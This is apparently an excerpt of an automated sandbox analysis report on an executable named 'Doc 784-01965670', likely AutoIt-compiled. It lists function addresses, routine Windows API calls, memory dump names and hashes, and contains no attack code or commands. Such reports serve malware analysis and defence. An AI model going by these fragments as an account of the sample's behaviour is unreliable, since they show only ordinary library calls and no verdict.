                                                                                                                                    • Opcode ID: 6b0dcf7875e5cc8b2f124becf3425b1e3567ced601fe1f13ac9ef2b9b8e14b5c
                                                                                                                                    • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                                                                                    • Opcode Fuzzy Hash: 6b0dcf7875e5cc8b2f124becf3425b1e3567ced601fe1f13ac9ef2b9b8e14b5c
                                                                                                                                    • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                                                                                    Function 004555D6 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteDestroyObject$IconWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3349847261-0
                                                                                                                                    • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                                    • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                                                                    • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                                    • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                                                                    Function 0044B600 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2223660684-0
                                                                                                                                    • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                                    • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                                                                                    • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                                    • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                                                                                    Function 00447268 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                    • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                                                                    • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                                                                    • EndPath.GDI32(?), ref: 004472B0
                                                                                                                                    • StrokePath.GDI32(?), ref: 004472BE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2783949968-0
                                                                                                                                    • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                    • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                                                                    • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                    • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                                                                    Function 00417D0E Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __getptd.LIBCMT ref: 00417D1A
                                                                                                                                      • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                                      • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                                    • __getptd.LIBCMT ref: 00417D31
                                                                                                                                    • __amsg_exit.LIBCMT ref: 00417D3F
                                                                                                                                    • __lock.LIBCMT ref: 00417D4F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3521780317-0
                                                                                                                                    • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                                    • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                                                                                    • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                                    • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                                                                                    Function 00471144 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDesktopWindow.USER32 ref: 00471144
                                                                                                                                    • GetDC.USER32(00000000), ref: 0047114D
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                    • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                                    • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                                                                    • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                                    • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                                                                    Function 00471102 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDesktopWindow.USER32 ref: 00471102
                                                                                                                                    • GetDC.USER32(00000000), ref: 0047110B
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                    • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                                    • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                                                                    • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                                    • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                                                                    Function 004389A1 Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                                    • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2710830443-0
                                                                                                                                    • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                                    • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                                                                                    • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                                    • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                                                                                    Function 004390C2 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                                                                    • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                                                                      • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                                                                      • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                    • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                                    • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                                                                                    • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                                    • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                                                                                    Function 0041405D Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                                                                      • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                                    • __getptd_noexit.LIBCMT ref: 00414080
                                                                                                                                    • __freeptd.LIBCMT ref: 0041408A
                                                                                                                                    • ExitThread.KERNEL32 ref: 00414093
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3182216644-0
                                                                                                                                    • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                                    • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                                                                                    • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                                    • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                                                                                    Function 0046EDC6 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                    • String ID: $8'I
                                                                                                                                    • API String ID: 2358735015-3608026889
                                                                                                                                    • Opcode ID: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                                                                                                                    • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                                                                                    • Opcode Fuzzy Hash: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                                                                                                                    • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                                                                                    Function 00478373 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                      • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                                                                      • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                                                                                    • String ID: AutoIt3GUI$Container
                                                                                                                                    • API String ID: 3380330463-3941886329
                                                                                                                                    • Opcode ID: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                                                    • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                                                                                    • Opcode Fuzzy Hash: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                                                    • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                                                                    Function 004099A8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 00409A61
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                    • String ID: 0vH
                                                                                                                                    • API String ID: 1143807570-3662162768
                                                                                                                                    • Opcode ID: c09e7a550d587b66afd16ae3f9308ee528eb86d4dd4285a1c93ad52bd0ffcd86
                                                                                                                                    • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                                                                                    • Opcode Fuzzy Hash: c09e7a550d587b66afd16ae3f9308ee528eb86d4dd4285a1c93ad52bd0ffcd86
                                                                                                                                    • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                                                                                    Function 00466587 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: HH$HH
                                                                                                                                    • API String ID: 0-1787419579
                                                                                                                                    • Opcode ID: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                                                                                    • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                                                                    • Opcode Fuzzy Hash: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                                                                                    • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                                                                    Function 00444652 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
